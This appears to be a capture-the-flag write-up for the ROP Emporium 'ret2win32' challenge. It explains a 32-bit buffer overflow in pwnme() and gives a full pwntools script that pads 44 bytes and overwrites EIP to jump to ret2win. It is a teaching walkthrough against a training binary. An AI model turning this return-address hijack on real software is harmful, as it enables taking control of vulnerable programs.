ret2win32

Intro

today we are going to be tackling the first challenge on ROP Emporium which is a series of challenges to teach ROP Return Oriented Programming

download the x86 zip file and extract it using unzip, you will get 2 files a 32 bit executable and a flag.txt file which will be revealed if you exploit the binary

Basic Executable Reconnaissance

the executable is not stripped which makes reverse engeneering easier because it doesnt hide function names and the executable is dynamically linked so the libc library which contains many external tlike fprintf() are not loaded within the executable but they dynamically linked at the execution time

we have only one security configuration enabled which is NX No-Execute also known as Data Execution Prevention or DEP marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.

checksec --file=ret2win32

Reverse Engeneering the Binary

open the binary using ghidra so we can read the source code and take a look at the functions

Binary Functions

in this list of functions there is 3 interesting functions main and pwnme and ret2win where the main is the entry and pwnme is the vulnerable function and ret2win is the function that will print the flag

this the main function let's jump to pwnme

the read function is vunerable because the buffer takes 40 bytes as maximum and the read function takes upto 56 bytes so we can exploit the 16 bytes left to overflow the buffer and hijack the execution flow

so the final plan is exploiting read() from pwnme function by overflowing the buffer and overwrite the EIP address value with the ret2win function address to print the flag

Locating EIP Offset

EIP is the return address value af a function so if we can to overwrite this value we can jump to another address that we specify in this challenge we want to jump to the ret2win function address

to find the offset we will use gdb pwndbg plugin

cyclic generates a char pattern that will help us identify the the offset to the EIP in this case we're generating a 100 char pattern because we know that less than 100 is enaugh to crash the binary and overwrite the EIP

let's run the binary and send this pattern as input

wait for the binary to crash and then take the 4 char pattern that have overwritten the EIP and find out the offset

the offset is 44

Python Exploit using Pwntools

we are going to import the pwntools library because it will help us write the exploit

from pwn import *

we will setup the architecture so the pwntools library will analyze the executable's archeticture and convert the addresses to the correct format 32bit little endianne or 64bit little endianne so they are correctly aligned in the stack without us doing this manually

exe = './ret2win32'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'

open the executable in a process

io = process(exe)

padding the payload with the offset and overwrite the EIP with the address of the ret2win function and send this payload as input

offset = 44
payload = flat(
	offset * b'A',
	elf.functions.ret2win
)

write("payload", payload)
io.sendlineafter(b'>', payload)

io.interactive()

this is the final script

from pwn import *

# Set up pwntools for the correct architecture
exe = './ret2win32'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
io = process(exe)
offset = 44
payload = flat(
	offset * b'A',
	elf.functions.ret2win
)

write("payload", payload)
io.sendlineafter(b'>', payload)

io.interactive()

now let's run it and BOOM we have Hijacked the Execution Flow

Greeting From Sayonara

PreviousROP Emporium Nextret2win64

Last updated 1 year ago

Was this helpful?